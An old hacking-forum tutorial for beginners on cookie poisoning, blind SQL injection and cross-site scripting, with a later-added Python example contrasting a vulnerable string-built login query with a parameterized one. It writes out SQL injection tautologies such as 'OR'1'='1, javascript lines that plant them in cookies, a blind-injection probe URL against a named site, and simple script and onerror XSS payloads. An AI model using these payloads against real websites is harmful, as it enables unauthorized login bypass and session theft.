Friday, November 21, 2008
Basic Web Hackings For newbs and pr0's





website security By me!



/**********************************************************************************************************************

Hello, this is mr me and I am going to introduce you to:

**********************************************************************************************************************/


|----------------------------------------------------------------------------------------------------------------------|
Cookie Poisoning
|----------------------------------------------------------------------------------------------------------------------|

Well, for starters, I can begin by saying that cookie poisoning is a lot like SQL injection.

Both use strings like 'OR'1'='1 or maybe '1'='1'

But in cookie poisoning you begin by displaying your cookies in an alert:

javascript:alert(document.cookie)

Then you will perhaps see "username=JohnDoe" and "password=iloveJaneDoe"

In this case the cookie poisoning could be:

javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");

There are also many versions of this kind, for example:

'

'1'='1'

'OR'1'='1

'OR'1'='1'OR'

and so on...

You may have to try 13 things before you get it completely right...
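
The server-side view of the cookie example above, as an added example that is not part of the original article: a login lookup that pastes cookie values into its SQL string, beside the same lookup with bound parameters. The users table, the function names and the second account are constructed for illustration, and SQLite stands in for the site's database.

```python
import sqlite3

def parse_cookie_header(header):
    """Split a Cookie header into a dict; every value is client-controlled."""
    jar = {}
    for pair in header.split(";"):
        name, _, value = pair.strip().partition("=")
        if name:
            jar[name] = value
    return jar

def make_db():
    # Constructed sample data: one account from the article, one invented.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('JohnDoe', 'iloveJaneDoe')")
    db.execute("INSERT INTO users VALUES ('JaneDoe', 'constructed-pw')")
    return db

def lookup_concatenated(db, jar):
    # Weak pattern: cookie text is pasted into the SQL string, so quotes in
    # the cookie close the literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username='" + jar.get("username", "")
           + "' AND password='" + jar.get("password", "") + "'")
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, jar):
    # Hardened pattern: values are bound as data and never parsed as SQL.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    args = (jar.get("username", ""), jar.get("password", ""))
    return [row[0] for row in db.execute(sql, args)]

# Cookie headers taken from the article's example values.
HONEST = "username=JohnDoe; password=iloveJaneDoe"
POISONED = "username='OR'1'='1; password='OR'1'='1"

if __name__ == "__main__":
    db = make_db()
    for label, header in (("honest", HONEST), ("poisoned", POISONED)):
        jar = parse_cookie_header(header)
        print(label, "concatenated:", lookup_concatenated(db, jar))
        print(label, "parameterized:", lookup_parameterized(db, jar))
```

Binding parameters closes the injection, but a plaintext password kept in a cookie is still readable by anyone who can read the cookie; an opaque server-side session ID avoids storing it there at all.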


|----------------------------------------------------------------------------------------------------------------------|
Blind SQL Injection
|----------------------------------------------------------------------------------------------------------------------|


Well, to find out if a page is vulnerable to Blind SQL Injection you can test it this way for example:

http://www.darkmindz.com/index.php?id=2

Now this request is asking the DB to SELECT (required data) FROM (required table) WHERE id = 2.

We can exploit this by adding our own special little query on the end... For example:

http://www.darkmindz.com/index.php?id=2 AND 1=


|----------------------------------------------------------------------------------------------------------------------|
XSS (Cross-site scripting)
|----------------------------------------------------------------------------------------------------------------------|


XSS is used by attackers to steal cookies, which means that the attacker can access PHPSESSIDs, usernames, passwords and all that.

How to use it?

In contact boxes or forms and all possible things you can enter something like this:

<script>alert("owned by cLtmstr")</script>


You can also use other payloads like this:

<img src="banner.png" onerror="alert('owned by cLtmstr')">


So you see this can be very useful...

Try googling for XSS to get more info about it.


|----------------------------------------------------------------------------------------------------------------------|
Thanks for looking at my article, please rate and comment...
|----------------------------------------------------------------------------------------------------------------------|


/***********************************************************************************************************************

Ending Transmission_

***********************************************************************************************************************/

© HellBound Hackers 2007- 2008. Since 3rd December 2004.